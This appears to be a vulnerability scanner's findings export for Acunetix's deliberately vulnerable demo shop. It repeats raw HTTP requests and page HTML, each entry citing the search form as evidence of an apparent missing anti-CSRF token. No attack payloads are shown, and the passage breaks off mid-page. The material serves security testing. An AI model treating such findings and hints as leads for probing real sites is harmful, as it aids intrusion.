Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:43 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4958 |
Response Body - size: 4,958 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>Home of Acunetix Art</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">welcome to our page</h2> <div class="story"> <h3>Test site for Acunetix WVS.</h3> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/ |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 447 bytes. |
GET http://testphp.vulnweb.com/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: cross-site Sec-Fetch-User: ?1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:14:55 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4958 |
Response Body - size: 4,958 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>Home of Acunetix Art</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">welcome to our page</h2> <div class="story"> <h3>Test site for Acunetix WVS.</h3> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/artists.php |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 262 bytes. |
GET http://testphp.vulnweb.com/artists.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:45 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5328 |
Response Body - size: 5,328 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>artists</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class='story'><a href='artists.php?artist=1'><h3>r4w8173</h3></a><p><a href='#' onClick="window.open('./comment.php?aid=1','comment','width=500,height=400')">comment on this artist</a></p></div><div class='story'><a href='artists.php?artist=2'><h3>Blad3</h3></a><p><a href='#' onClick="window.open('./comment.php?aid=2','comment','width=500,height=400')">comment on this artist</a></p></div><div class='story'><a href='artists.php?artist=3'><h3>lyzae</h3></a><p><a href='#' onClick="window.open('./comment.php?aid=3','comment','width=500,height=400')">comment on this artist</a></p></div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/artists.php?artist=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 283 bytes. |
GET http://testphp.vulnweb.com/artists.php?artist=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:55 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6251 |
Response Body - size: 6,251 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>artists</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>artist: r4w8173</h2><div class='story'><p><p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p> <p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p></p><p><a href='listproducts.php?artist=1'>view pictures of the artist</a></p><p><a href='#' onClick="window.open('./comment.php?aid=1','comment','width=500,height=400')">comment on this artist</a></p></div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/artists.php?artist=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 283 bytes. |
GET http://testphp.vulnweb.com/artists.php?artist=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:56 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6193 |
Response Body - size: 6,193 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>artists</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>artist: Blad3</h2><div class='story'><p><p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p> <p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p></p><p><a href='listproducts.php?artist=2'>view pictures of the artist</a></p><p><a href='#' onClick="window.open('./comment.php?aid=2','comment','width=500,height=400')">comment on this artist</a></p></div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/artists.php?artist=3 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 283 bytes. |
GET http://testphp.vulnweb.com/artists.php?artist=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:57 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6193 |
Response Body - size: 6,193 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>artists</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a 